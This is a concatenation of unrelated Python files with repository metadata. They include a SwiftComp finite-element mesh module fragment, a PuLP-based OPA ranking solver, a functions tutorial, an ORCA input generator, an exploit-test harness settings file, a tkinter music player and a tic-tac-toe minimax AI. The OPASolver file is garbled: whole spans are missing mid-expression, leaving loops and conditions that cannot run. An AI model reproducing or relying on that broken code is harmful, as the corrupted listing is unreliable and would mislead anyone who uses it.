Linear tetrahedral element: kTet4\n Element.elementType = 'kTet4'\n Element.total_node = 4\n Element.total_corner_node = 4\n Element.connectivity = connectivity + [0] * 16\n elif len(connectivity) == 10: # Quadratic tetrahedral element: kTet10\n Element.elementType = 'kTet10'\n Element.total_node = 10\n Element.total_corner_node = 4\n Element.connectivity = connectivity[0:4] + [0] + connectivity[4:10] + [0] * 9\n elif len(connectivity) == 8: # Linear brick element: kHex8\n Element.elementType = 'kHex8'\n Element.total_node = 8\n Element.total_corner_node = 8\n Element.connectivity = connectivity + [0] * 12\n elif len(connectivity) == 20: # Quadratic brick element: kHex20\n Element.elementType = 'kHex20'\n Element.total_node = 20\n Element.total_corner_node = 8\n Element.connectivity = connectivity\n else:\n utilities.element3DTypeWrongMessage()\n raise EOFError\n self.Element.append(Element)\n\n # set material id for each element\n for i in range(self.nmate):\n element_ids = ExtAPI.DataModel.Project.Model.Analyses[0].MeshData.MeshRegionById(self.Material[i].body_id).ElementIds\n for element_id in element_ids:\n self.Element[element_id-1].material_id = i + 1\n\n def setOmega(self, ExtAPI):\n '''\n ================================================================\n Homogenized SG volume calculation\n ---------------------------------\n Solid model (3D structural model): Volume of the homogenized material\n including both the volume of the material and the volume of possible\n voids in the SG.\n 1D SG: Length\n 2D SG: Area\n 3D SG: Volume\n ---------------------------------\n Plate/shell model\n 1D SG: 1.0\n 2D SG: Length along y2\n 3D SG: Area spanned by y1 and y2\n ---------------------------------\n Beam model\n 2D SG: 1.0\n 3D SG: Length along y1\n ================================================================\n '''\n node_x = [x.coordinate[0] for x in self.Node]\n node_y = [y.coordinate[1] for y in self.Node]\n node_z = [z.coordinate[2] for z in self.Node]\n\n len_x = max(node_x) - min(node_x)\n len_y = max(node_y) - min(node_y)\n len_z = max(node_z) - min(node_z)\n\n if self.SolidModel: # solid model\n if self.nSG == 1:\n self.omega = len_x\n elif self.nSG == 2:\n self.omega = len_y * len_z\n elif self.nSG == 3:\n self.omega = len_x * len_y * len_z\n elif self.PlateModel: # plate/shell model\n if self.nSG == 1:\n self.omega = 1.0\n elif self.nSG == 2:\n self.omega = len_y\n elif self.nSG == 3:\n self.omega = len_x * len_y\n elif self.BeamModel: # beam model\n if self.nSG == 1:\n pass # error\n elif self.nSG == 2:\n self.omega = 1.0\n elif self.nSG == 3:\n self.omega = len_x\n\n\nclass BeamModel:\n '''BeamModel class\n attributes: submodel, beam_ini_curvatures, beam_ini_oblique\n '''\n def __init__(self):\n self.submodel = 0\n self.beam_ini_curvatures = []\n self.beam_ini_oblique = []\n\n def setBeamModel(self, submodel, beam_ini_curvatures, beam_ini_oblique):\n beamModelName = {'Euler-Bernoulli Beam Model': 0, 'Timoshenko Beam Model': 1,\n 'Vlasov Beam Model': 2, 'Beam Model With the Trapeze Effect': 3}\n self.submodel = beamModelName[submodel]\n self.beam_ini_curvatures = beam_ini_curvatures\n self.beam_ini_oblique = beam_ini_oblique\n\n\nclass PlateModel:\n '''PlateModel class\n attributes: submodel, plate_ini_curvatures\n '''\n def __init__(self):\n self.submodel = 0\n self.plate_ini_curvatures = []\n\n def setPlateModel(self, submodel, plate_ini_curvatures):\n plateModelName = {'Kirchhoff-Love Model': 0, 'Reissner-Mindlin Model': 1}\n self.submodel = plateModelName[submodel]\n 
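# Editor's note (illustrative values, names taken from this class only): e.g.\n        # setPlateModel('Reissner-Mindlin Model', [0.0, 0.0, 0.0]) stores\n        # submodel == 1 and keeps plate_ini_curvatures exactly as passed in.\n        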
self.plate_ini_curvatures = plate_ini_curvatures\n\n\nclass SolidModel:\n def __init__(self):\n pass\n","repo_name":"banghuazhao/ANSYS_Workbench-SwiftComp_GUI","sub_path":"src/SwiftComp/sg.py","file_name":"sg.py","file_ext":"py","file_size_in_byte":34229,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"34776982433","text":"from matplotlib import pyplot\r\nfrom pulp import LpMaximize, LpProblem, LpStatus, lpSum, LpVariable,GLPK\r\n\r\nclass OPASolver:\r\n experts=[] # experts=[{\"name\"=\"Alami\",\"rank\"=1,weight=0.235},{\"name\":\"Salami\",\"rank\":2,weight:0.134},...]\r\n criterias=[] # criterias=[{\"name\"=\"price\",\"rank\"=1,weight=0.4},{\"name\":\"power\",\"rank\":2,weight:0.121},...]\r\n alternatives=[] # alternatives=[{\"name\"=\"Renault\",\"rank\"=1,weight=0.564},{\"name\":\"Fiat\",\"rank\":2,weight:0.215},...]\r\n expertsCriterias=[] # expertsCriterias=[{\"expert\":\"Alami\",\"criterias\":[{\"name\":\"power\",\"rank\":1},{\"name\":\"price\",\"rank\":2}]},{\"expert\":\"Salami\",\"criterias\":[{\"name\"=\"power\",\"rank\"=1},{\"name\"=\"price\",\"rank\"=2}]},...]\r\n preferenceDegreeExpert=1\r\n preferenceDegreeCriteria=1\r\n preferenceDegreeAlternative=1\r\n model=LpProblem(name=\"OPA\", sense=LpMaximize)\r\n expertsCriteriasAlternatives=[]\r\n def __init__(self,e=[],c=[],a=[],ec=[],eca=[]):\r\n self.experts=e\r\n self.criterias=c\r\n self.alternatives=a\r\n self.expertsCriterias=ec\r\n self.expertsCriteriasAlternatives=eca\r\n self.model = LpProblem(name=\"OPA\", sense=LpMaximize)\r\n #__________________________ Degree of preference __________________\r\n def setPreferenceDegreeExpert(self,d=1):\r\n self.preferenceDegreeExpert=d;\r\n def setPreferenceDegreeCriteria(self,d=1):\r\n self.preferenceDegreeCriteria=d;\r\n def setPreferenceDegreeAlternative(self,d=1):\r\n self.preferenceDegreeAlternative=d;\r\n \r\n def getPreferenceDegreeExpert(self,d=1):\r\n return self.preferenceDegreeExpert;\r\n def getPreferenceDegreeCriteria(self,d=1):\r\n return self.preferenceDegreeCriteria;\r\n def getPreferenceDegreeAlternative(self,d=1):\r\n return self.preferenceDegreeAlternative;\r\n #_______________________________Builders_____________________\r\n def addExpert(self,name,rank):\r\n for expert in self.experts:\r\n if(expert[\"name\"]==name):\r\n print(\"This expert already exists !!\")\r\n return \r\n self.experts.append({\"name\":name,\"rank\":rank})\r\n def addCriteria(self,name,rank=0):\r\n for criteria in self.criterias:\r\n if(criteria[\"name\"]==name):\r\n print(\"This criteria already exists !!\")\r\n return \r\n self.criterias.append({\"name\":name,\"rank\":rank})\r\n def addAlernative(self,name):\r\n for alternative in self.alternatives:\r\n if(alternative[\"name\"]==name):\r\n print(\"This alternative already exists !!\")\r\n return \r\n self.alternatives.append({\"name\":name})\r\n #________________________________________________________________\r\n def setCriteriaRanks(self):\r\n for i in range (len(self.criterias)):\r\n rank=len(self.criterias)\r\n for j in range(len(self.criterias)):\r\n if(self.criterias[j][\"weight\"] -1):\r\n lenght=len(self.expertsCriterias[j][\"criterias\"])\r\n if(lenght==0) : \r\n self.expertsCriterias[j][\"criterias\"]=[{\"criteria\":criteria,\"rank\":rank}]\r\n else : \r\n c=0\r\n while(c -1 ) and (c>-1)): \r\n lenght=len(self.expertsCriteriasAlternatives[j][\"criterias\"][c][\"alternatives\"]) \r\n a=0\r\n while(a=z\r\n else: \r\n self.model += 
coefficients[i]*(weights[i]-weights[i+1])>=z\r\n self.model += sum([weights[i] for i in range(dim)])==1\r\n \r\n \r\n # Add the objective function to the model\r\n self.model += lpSum([z, z])\r\n status = self.model.solve()\r\n liste= self.model.variables()\r\n w=0;\r\n for i in range(len(self.experts)):\r\n self.experts[i][\"weight\"]=0\r\n for i in range(len(self.criterias)):\r\n self.criterias[i][\"weight\"]=0\r\n for i in range(len(self.alternatives)):\r\n self.alternatives[i][\"weight\"]=0\r\n\r\n for i in range(len(self.expertsCriteriasAlternatives)):\r\n c=len(self.expertsCriteriasAlternatives[i][\"criterias\"])\r\n self.expertsCriteriasAlternatives[i][\"weight\"]=0\r\n expertName=self.expertsCriteriasAlternatives[i][\"expert\"]\r\n index=self.indiceExpert(expertName)\r\n self.experts[index][\"weight\"]=0\r\n for j in range(c):\r\n a=len(self.expertsCriteriasAlternatives[i][\"criterias\"][j][\"alternatives\"]);\r\n criteriaIndex=self.indiceCriteria(self.expertsCriteriasAlternatives[i][\"criterias\"][j][\"criteria\"])\r\n for k in range(a):\r\n self.expertsCriteriasAlternatives[i][\"criterias\"][j][\"alternatives\"][k][\"weight\"]=liste[w].value()\r\n print(liste[w].name,\" = \",liste[w].value())\r\n alternativeIndex=self.indiceAlternative(self.expertsCriteriasAlternatives[i][\"criterias\"][j][\"alternatives\"][k][\"alternative\"])\r\n self.expertsCriteriasAlternatives[i][\"weight\"]+=liste[w].value()\r\n self.experts[index][\"weight\"]+=liste[w].value()\r\n self.criterias[criteriaIndex][\"weight\"]+=liste[w].value()\r\n self.alternatives[alternativeIndex][\"weight\"]+=liste[w].value()\r\n w=w+1;\r\n self.setCriteriaRanks()\r\n self.setAlternativeRanks()\r\n return liste \r\n#---------------------------------------------------------------------------------------\r\n #______________________ getters and setters ______________________ \r\n def getExperts(self):\r\n return self.experts\r\n def getCriterias(self):\r\n return self.criterias\r\n def getAlternatives(self):\r\n return self.alternatives\r\n #________________________ OPA output weights _____________________\r\n def getExpertsWeights(self):\r\n dics={}\r\n for expert in self.experts:\r\n if (\"weight\" not in expert):\r\n print(\"the experts weights are not yet calculated !!\")\r\n return {}\r\n else : dics[expert[\"name\"]]=expert[\"weight\"]\r\n return dics\r\n def getCriteriasWeights(self):\r\n dics={}\r\n for criteria in self.criterias:\r\n if (criteria['weight']==0):\r\n print(\"the criterias weights are not yet calculated !!\")\r\n return {}\r\n else : dics[criteria[\"name\"]]=criteria[\"weight\"]\r\n return dics\r\n def getAlternativesWeights(self):\r\n dics={}\r\n for alternative in self.alternatives:\r\n if (alternative['weight']==0):\r\n print(\"the alternatives weights are not yet calculated !!\")\r\n return {}\r\n else : dics[alternative[\"name\"]]=alternative[\"weight\"]\r\n return dics\r\n #_________________ graphic drawing _________\r\n def drawExpertWeights(self):\r\n dics=self.getExpertsWeights()\r\n self.drawWeights(dics,\"#5C9AD6\",\"Experts\")\r\n def drawCriteriasWeights(self):\r\n dics=self.getCriteriasWeights()\r\n pyplot.bar(list(dics.keys()),dics.values())\r\n self.drawWeights(dics,\"#FCC000\",\"Criterias\")\r\n def drawAlternativesWeights(self):\r\n dics=self.getAlternativesWeights()\r\n self.drawWeights(dics,\"#ED7D31\",\"Alternatives\")\r\n \r\n def drawWeights(self,dics,color,param=\"\"):\r\n pyplot.bar(list(dics.keys()),dics.values(),color =color,\r\n width = 0.8)\r\n pyplot.grid(color='#95a5a6', 
linestyle=':', linewidth=0.5, axis='y')\r\n        pyplot.xlabel(param)\r\n        pyplot.ylabel('Weights')\r\n        pyplot.title('weights of '+param)\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"abendarag/-ElsevierSoftwareX-","sub_path":"OPASolver.py","file_name":"OPASolver.py","file_ext":"py","file_size_in_byte":12861,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"33405012398","text":"#Function - code you want to use repeatedly\n\n#def my_function():\n#    Do This\n#    Then Do This\n#    Finally Do This\n\n#Function with inputs\n#def my_function(something):\n#    Do This With something\n#    Then Do This\n#    Finally Do This\n\n#Functions with Outputs\n#def my_function():\n#    Do This With something\n#    Then Do This\n#    Finally Do This\n\n#return tells the function that it is the end\n\ndef format_name1(f_name, l_name):\n    if f_name == \"\" or l_name == \"\":\n        return \"You didn't provide valid inputs.\"\n    formatted_f_name = f_name.title()\n    formatted_l_name = l_name.title()\n    return f\"Result: {formatted_f_name} {formatted_l_name}\\n\"\n\n\n#Storing output in a variable\nformatted_name = format_name1(input(\"Your first name: \"), input(\"Your last name: \"))\nprint(formatted_name)\n#or printing output directly\nprint(format_name1(input(\"What is your first name? \"), input(\"What is your last name? \")))\n\n#Return as an early exit\ndef format_name2(f_name, l_name):\n    # Below is a docstring that will appear as function description\n    \"\"\"Take a first and last name and format it\n    to return the title case version of the name.\"\"\"\n    if f_name == \"\" or l_name == \"\":\n        #early return\n        return \"You didn't provide valid inputs.\"\n    formatted_f_name = f_name.title()\n    formatted_l_name = l_name.title()\n    return f\"Result: {formatted_f_name} {formatted_l_name}\\n\"\n\n#Storing output in a variable\nformatted_name = format_name2(input(\"Your first name: \"), input(\"Your last name: \"))\nprint(formatted_name)\n#or printing output directly\nprint(format_name2(input(\"What is your first name? \"), input(\"What is your last name? \")))\n\n#Already used functions with outputs.\noutput = len(\"Javier Soto\")\nprint(f\"Length of output = {output}.\")\n\n#format_name2()  # would raise TypeError: both f_name and l_name are required\n","repo_name":"jsoto3000/angela-yu-100-days-python","sub_path":"day-010/functions-with-outputs.py","file_name":"functions-with-outputs.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"35690977181","text":"#!/usr/bin/python3\n\nimport os\nfrom numpy import *\nimport copy\nimport sys\nimport itertools\nfrom pathlib import Path\n\n\nclass Atom:\n    def __init__(self,x,y,z,name,element):\n        self.name = name\n        self.element = element\n        self.x = array([x,y,z])\n\nsystem = []\nsystem.append(Atom(-3,0,0,\"He\",\"He\"))\nsystem.append(Atom(0,3,0,\"He\",\"He\"))\nsystem.append(Atom(0,-3,0,\"He\",\"He\"))\nsystem.append(Atom(0,0,3,\"He\",\"He\"))\nsystem.append(Atom(0,0,-3,\"He\",\"He\"))\nsystem.append(Atom(0,0,0,\"He\",\"He\"))\nsystem.append(Atom(12345,0,0,\"He\",\"He\"))\n\n\nfor size in range(1,len(system)):\n    for i, combination in enumerate(itertools.combinations(range(len(system)),size)):\n        name = str(size) + \"/\" + str(i)\n        Path(\"outputFiles/{}\".format(name)).mkdir(parents=True, exist_ok=True)\n        fileName = \"outputFiles/{}/input.inp\".format(name)\n        with open(fileName, \"w\") as f:\n            f.write(\"! 
CCSD(T) verytightscf aug-cc-pvtz NoAutoStart\\n\\n\")\n f.write(\"%mdci\\n\")\n f.write(\"MaxIter 100\\n\")\n f.write(\"STol 1e-6\\n\")\n f.write(\"end\\n\\n\")\n f.write(\"%pal\\n\")\n f.write(\"nprocs {}\\n\".format(size))\n f.write(\"end\\n\\n\")\n f.write(\"%MaxCore 5000\\n\")\n f.write(\"\\n\\n\")\n f.write(\"*xyz 0 1\\n\")\n for j, atom in enumerate(system):\n if j in combination:\n f.write(\"{} {} {} {}\\n\".format(system[j].element,system[j].x[0],system[j].x[1],system[j].x[2]))\n else:\n f.write(\"{} : {} {} {}\\n\".format(system[j].element,system[j].x[0],system[j].x[1],system[j].x[2]))\n f.write(\"*\\n\")\n f.write(\"$new_job\")\n f.write(\"\\n\")\n f.write(\"! CCSD(T) verytightscf aug-cc-pvqz NoAutoStart\\n\\n\")\n f.write(\"%mdci\\n\")\n f.write(\"MaxIter 100\\n\")\n f.write(\"STol 1e-6\\n\")\n f.write(\"end\\n\\n\")\n f.write(\"%pal\\n\")\n f.write(\"nprocs {}\\n\".format(size))\n f.write(\"end\\n\\n\")\n f.write(\"%MaxCore 5000\\n\")\n f.write(\"\\n\\n\")\n f.write(\"*xyz 0 1\\n\")\n for j, atom in enumerate(system):\n if j in combination:\n f.write(\"{} {} {} {}\\n\".format(system[j].element,system[j].x[0],system[j].x[1],system[j].x[2]))\n else:\n f.write(\"{} : {} {} {}\\n\".format(system[j].element,system[j].x[0],system[j].x[1],system[j].x[2]))\n f.write(\"*\\n\")\n\n\n","repo_name":"mattkmostrom/Scripting-Fun","sub_path":"tuples.py","file_name":"tuples.py","file_ext":"py","file_size_in_byte":2507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41494574172","text":"import os\nfrom sys import platform as _platform\n##################################docker config#################################\ndocker_url_linux = \"unix://var/run/docker.sock\"\ndocker_url_other = \"tcp://localhost:4243\"\n\ndocker_url = docker_url_linux if _platform.lower().startswith(\"linux\") else docker_url_other\n\n#mapped_port_in = 80 # for apache\nmapped_port_in = 8888 # for node\nmapped_port_out = 49160\n\nreport_verbosity = \"DEBUG\"\nspoiled_mode = False\nbrowser_visible = False\ntimeout = 5\n################################################################################\n\n###################################file config##################################\n\ncurrent_path = os.path.dirname(os.path.realpath(__file__))\n\n## results default folder\nresults_filename = current_path + \"/reports/TestResults.csv\"\n\n##input dirs\napplications_path = current_path + \"/data/targets/applications/\"\nconfigurations_path = current_path + \"/data/targets/configurations/\"\ncontainers_path = current_path + \"/data/targets/containers/\"\nexploits_path = current_path + \"/data/exploits/\"\n\n################################################################################\n","repo_name":"soulr3aver/TestREx","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30068126577","text":"\"\"\"\r\n\n\nCreate a function that turns a list of words into a comma separated list,\nwhere the last word is separated by the word \"and\".\n\n### Examples\n\n words_to_sentence([\"edabit\"]) ➞ \"edabit\"\n \n words_to_sentence([\"Hello\", \"\", \"Bye\"]) ➞ \"Hello and Bye\"\n \n words_to_sentence([\"Hello\", \"Bye\", \"See you soon\"]) ➞ \"Hello, Bye and See you soon\"\n\n### Notes\n\n`None` values, empty lists or lists with only empty or `None` values should\nreturn an empty string: `\"\"`\n\n\"\"\"\r\n\ndef 
words_to_sentence(w):\n if not bool(w) or w[0] == \"\":\n return \"\"\n if len(w) == 1:\n return w[0]\n words = [ch for ch in w if len(ch) > 0]\n if 1 < len(words) < 3:\n return \"{} and {}\".format(words[0], words[-1])\n return \"{}, {} and {}\".format(words[0], \", \".join(words[1:-1]), words[-1])\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"GP6CEr9a5CMqPHY7C_12.py","file_name":"GP6CEr9a5CMqPHY7C_12.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18089849785","text":"from tkinter import *\nfrom tkinter import filedialog\nfrom tkinter import messagebox\nfrom pygame import mixer\nimport os\n\nroot = Tk()\n\n#Create Menubar\nmenubar = Menu(root)\nroot.config(menu=menubar)\n\n#Create sub menu\nsubMenu = Menu(menubar, tearoff=0)\ndef browse_file():\n global filename\n filename = filedialog.askopenfilename()\n\nmenubar.add_cascade(label='File', menu=subMenu)\nsubMenu.add_command(label='Open',command=browse_file)\nsubMenu.add_command(label='Exit',command=root.destroy)\n\ndef About_Us():\n messagebox.showinfo('About Music Player','Developer: Nishit Singh \\nContact Me: ns2023@gmail.com')\n\nsubMenu = Menu(menubar, tearoff=0)\nmenubar.add_cascade(label='Help', menu=subMenu)\nsubMenu.add_command(label='About Me', command=About_Us)\n\nmixer.init() #initializing the mixer\n\nroot.geometry('300x350+750+300')\nroot.title(\"Music Player\")\nroot.iconbitmap(r'pics\\music_player.ico')\n\ntext = Label(root,text='MUSIC PLAYER',fg = \"blue\", bg = \"yellow\", font = \"Verdana 20 bold\")\ntext.pack(pady=10)\n\ndef play_music():\n try:\n paused\n except NameError:\n\n try:\n mixer.music.load(filename)\n mixer.music.play()\n statusbar['text']= \"Playing Music\" + '-' + os.path.basename(filename)\n except:\n #tkinter.messagebox.showerror('File Not Found','File Not Found Please import song')\n browse_file()\n else:\n mixer.music.unpause()\n \ndef stop_music():\n filename = None\n mixer.music.stop()\n statusbar['text']= \"Stopped Music\"\n\ndef pause_music():\n global paused\n paused = TRUE\n mixer.music.pause()\n\ndef set_volume(volume):\n volume=int(volume) / 100\n mixer.music.set_volume(volume)\n\ndef rewind_music():\n play_music()\n statusbar['text']= \"Playing Music\" + '-' + os.path.basename(filename)\n\n\n\nmiddleframe = Frame(root)\nmiddleframe.pack(padx=15, pady=15)\n\n#===============================================================================\n\nplayphoto = PhotoImage(file='pics\\play.png')\nplaybtn = Button(middleframe, image=playphoto , command=play_music, width=200, bd=5)\nplaybtn.pack(pady=10)\n\n#===============================================================================\n\nstopphoto = PhotoImage(file='pics\\stop.png')\nstopbtn = Button(middleframe, image=stopphoto, command=stop_music ,bd=5)\nstopbtn.pack(side='left',padx=20, pady=10)\n\n#===============================================================================\n\npausephoto = PhotoImage(file='pics\\pause.png')\npausebtn = Button(middleframe, image=pausephoto, command=pause_music ,bd=5)\npausebtn.pack(side='left',padx=20, pady=10)\n\n#===============================================================================\n\nrewindphoto = PhotoImage(file='pics\\\\rewind-button.png')\nrewindbtn = Button(middleframe, image=rewindphoto, command=rewind_music ,bd=5)\nrewindbtn.pack(side='left',padx=20, pady=10)\n\n#===============================================================================\n\nscale = Scale(root, 
from_=0,to=100,orient=HORIZONTAL, command=set_volume, length=200, bd=5)\r\nscale.set(0.01)\r\nmixer.music.set_volume(0.01)\r\nscale.pack(pady=15)\r\n\r\n#===============================================================================\r\n\r\nstatusbar = Label(root, text='Welcome To Music Player', relief=SUNKEN)\r\nstatusbar.pack(side='bottom', fill=X)\r\n\r\n#===============================================================================\r\n\r\nroot.mainloop() # keeps the window displayed continuously\r\n","repo_name":"NishitSingh2023/MusicPlayer","sub_path":"MusicPlayer.py","file_name":"MusicPlayer.py","file_ext":"py","file_size_in_byte":3428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"29395145064","text":"from pprint import pprint\n\n\ndef transpose(table):\n    response = []\n    for i in range(len(table[0])):\n        response.append([])\n        for j in range(len(table)):\n            response[i].append(table[j][i])\n    return response\n\n\ndef delete_empty_rows(table):\n    return [row for row in table if row[0] is not None]\n\n\ndef delete_duplicate_rows(table):\n    added = set()\n    new_arr = []\n    for i in table:\n        if i[1] not in added:\n            new_arr.append(i)\n            added.add(i[1])\n    return new_arr\n\n\ndef transformer(i, value):\n    if i == 0:\n        return \"Выполнено\" if value == '1' else \"Не выполнено\"\n    if i == 3:\n        replaced = value.replace('+7', '')\n        return replaced[0:5] + \" \" + replaced[5:]\n\n\ndef transform(table):\n    for i in range(len(table)):\n        for j in range(len(table[i])):\n            if i == 2:\n                continue\n            if i == 1:\n                nt = table[i][j].split(\"&\")\n                table[i][j] = nt[1].replace('@', '[at]')\n                table[i+1][j] = \"%.4f\" % float(nt[0])\n            else:\n                table[i][j] = transformer(i, table[i][j])\n    return table\n\n\ndef main(table):\n    return transform(\n        transpose(\n            delete_duplicate_rows(\n                delete_empty_rows(table))\n        )\n    )\n\n\nif __name__ == \"__main__\":\n    pprint(main([['0', '0.5&vanukev58@mail.ru', '0', '+7(383)519-07-93'],\n                 ['0', '0.4&lorberg91@mail.ru', '0', '+7(750)715-50-78'],\n                 ['1', '0.8&samomanz67@rambler.ru', '1', '+7(978)710-52-97'],\n                 ['1', '0.1&zimifev36@rambler.ru', '1', '+7(558)309-64-82'],\n                 [None, None, None, None],\n                 [None, None, None, None],\n                 ['1', '0.1&zimifev36@rambler.ru', '1', '+7(558)309-64-82'],\n                 ['1', '0.1&zimifev36@rambler.ru', '1', '+7(558)309-64-82']]))\n","repo_name":"Skadar7/Python","sub_path":"KisPython/task10.py","file_name":"task10.py","file_ext":"py","file_size_in_byte":1895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"42241223927","text":"\r\n\r\n\r\ndef younger_person():\r\n    ages = [72,42,32,50,56,14,78,30,51,89,12,38,67,10]\r\n\r\n    solution = ages[0]\r\n    for age in ages:\r\n        if age < solution:\r\n            solution = age\r\n\r\n    print(solution)\r\n\r\n\r\ndef statistics():\r\n    data = [12,-1,123,345,412,4.55,123,23.4,123,4587,-129,94,956,14565,32, 0.001, 123]\r\n\r\n    count = 0\r\n    total = 0\r\n    negative = 0\r\n    over_500 = 0\r\n\r\n    for num in data:\r\n        count += 1\r\n        total += num\r\n\r\n        if num < 0:\r\n            negative = negative + 1\r\n\r\n        if(num > 500):\r\n            over_500 += 1\r\n\r\n    \r\n    print(f\"2 solution is: {total}\")\r\n    print(f\"1 solution is: {len(data)}\")\r\n\r\ndef print_some_nums():\r\n    #print the multiples of 10 that exist between 10 and 100\r\n\r\n    for num in range(1, 11):\r\n        print(num * 10)\r\n    \r\n    for x in range(10, 110, 10):\r\n        print(x)\r\n\r\n
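# Editor's sketch (not part of the original flow): younger_person's manual\r\n# scan is equivalent to the built-in reduction below.\r\n#   ages = [72, 42, 32, 50]\r\n#   min(ages)  # -> 32\r\n\r\n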
test\")\r\nyounger_person()\r\nstatistics()\r\nprint_some_nums()","repo_name":"durruita/backendv2","sub_path":"test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"31086684498","text":"import tkinter as tk\nimport tkinter as ttk\n# from tkinter import font as tkfont\nfrom PIL import Image, ImageTk\nimport random\nimport copy\nimport math\n\n# 定数\n\nfirst_col = \"#EE4444\"\nfirst_col_light = \"#EE9999\"\nsecond_col = \"#4444EE\"\nsecond_col_light = \"#9999EE\"\n\nC_DELAY = 400\n\n\n# ユーティリティ {{{\n\ndef from_rgb(col):\n return \"#%02x%02x%02x\" % col\n\n\ndef random_color():\n return (\n random.randrange(256),\n random.randrange(256),\n random.randrange(256)\n )\n\n\ndef my_polygon(canvas, pos, pos_list, *args, rotate=0, **kwargs):\n n = len(pos_list)\n\n pos_list = copy.deepcopy(pos_list)\n\n pos_list = list(map(lambda el: (\n pos[0] + (el[0] * math.cos(rotate) - el[1] * math.sin(rotate)),\n pos[1] + (el[0] * math.sin(rotate) + el[1] * math.cos(rotate))\n ), pos_list))\n for i in range(n):\n canvas.create_line(pos_list[i], pos_list[(i + 1) % n], *args, **kwargs)\n\n\ndef writePlayer(canvas, who, x, y, *, small=False):\n names = [\"first\", \"second\"]\n marks = [\"o\", \"x\"]\n cols = [first_col, second_col]\n if small:\n canvas.create_text(\n x, y,\n text=names[who], font=(\"Molot\", 18))\n canvas.create_text(\n x + 45 if who == 0 else x + 53, y-2,\n text=marks[who], fill=cols[who], font=(\"Molot\", 24))\n else:\n canvas.create_text(\n x, y,\n text=names[who], font=(\"Molot\", 26))\n canvas.create_text(\n x + 65 if who == 0 else x + 77, y,\n text=marks[who], fill=cols[who], font=(\"Molot\", 35))\n\n# }}}\n\n\n# クラス {{{\n\nclass Game:\n def __init__(self):\n self.board = [[0, 0, 0], [0, 0, 0], [0, 0, 0]]\n\n def get(self, i, j):\n assert(0 <= i < 3)\n assert(0 <= j < 3)\n return self.board[i][j]\n\n def set(self, i, j, k):\n assert(0 <= i < 3)\n assert(0 <= j < 3)\n assert(0 <= k <= 2)\n self.board[i][j] = k\n return self.check()\n\n def check(self):\n board = self.board\n for i in range(3):\n if board[i][0] == board[i][1] == board[i][2] != 0:\n return board[i][0]\n for i in range(3):\n if board[0][i] == board[1][i] == board[2][i] != 0:\n return board[0][i]\n if board[0][0] == board[1][1] == board[2][2] != 0:\n return board[0][0]\n if board[0][2] == board[1][1] == board[2][0] != 0:\n return board[0][2]\n if self.countNonZero() == 9:\n return -1\n return 0\n\n def countNonZero(self):\n cnt = 0\n for i in range(3):\n for j in range(3):\n if self.board[i][j]:\n cnt += 1\n return cnt\n\n # こういうのはデバッグ用に残しておく\n def output(self):\n print(\"-------\")\n for i in range(3):\n print(\"|\", end=\"\")\n for j in range(3):\n if self.get(i, j) == 0:\n print(\" \", end=\"\")\n elif self.get(i, j) == 1:\n print(\"o\", end=\"\")\n elif self.get(i, j) == 2:\n print(\"x\", end=\"\")\n print(\"|\", end=\"\")\n print()\n print(\"-------\")\n\n def outputWithNumber(self):\n num = 1\n fromNum = []\n print()\n print(\"-------\")\n for i in range(3):\n print(\"|\", end=\"\")\n for j in range(3):\n if game.get(i, j) == 0:\n print(num, end=\"\")\n num += 1\n fromNum.append((i, j))\n elif game.get(i, j) == 1:\n print(\"o\", end=\"\")\n elif game.get(i, j) == 2:\n print(\"x\", end=\"\")\n print(\"|\", end=\"\")\n print()\n print(\"-------\")\n return fromNum\n\n def __hash__(self):\n hs = 0\n for i in range(3):\n for j in range(3):\n hs += self.board[i][j] * (3 ** (i * 3 + j))\n return 
\n\nclass GameAI:\n    def __init__(self, func, name):\n        self.func = func\n        self.name = name\n\n    def think(self, me, game: Game):\n        return self.func(me, game)\n\n\ngame = Game()\n\n\ndef think1(me, game):\n    while(True):\n        select = (random.randrange(3), random.randrange(3))\n        if game.get(select[0], select[1]) == 0:\n            return select\n\n# }}}\n\n\n# Computation {{{\n\n# Memoized recursion: the essential complexity improvement\n\nmemo = {}\n\n\ndef think_dfs(me, you, game):\n    if hash(game) in memo:\n        return memo[hash(game)]\n    if game.check() != 0:\n        memo[hash(game)] = (game.check(), [])\n        return memo[hash(game)]\n\n    canWin = []\n    canReachDraw = []\n    some = []\n\n    for i in range(3):\n        for j in range(3):\n            if game.get(i, j) == 0:\n                game2 = copy.deepcopy(game)\n                game2.set(i, j, me)\n                winner = think_dfs(you, me, game2)[0]\n                if me == winner:\n                    canWin.append((i, j))\n                if winner == -1:\n                    canReachDraw.append((i, j))\n                some.append((i, j))\n    if canWin:\n        memo[hash(game)] = (me, canWin)\n    elif canReachDraw:\n        memo[hash(game)] = (-1, canReachDraw)\n    else:\n        memo[hash(game)] = (you, some)\n    return memo[hash(game)]\n\n\n# Pre-fill the memo table up front\nthink_dfs(1, 2, Game())\nthink_dfs(2, 1, Game())\n
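\n# Editor's sketch (illustrative): think_dfs returns a (winner, good_moves)\n# pair, and perfect play from the empty board is a draw, so\n#   think_dfs(1, 2, Game())[0]  # -> -1\n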
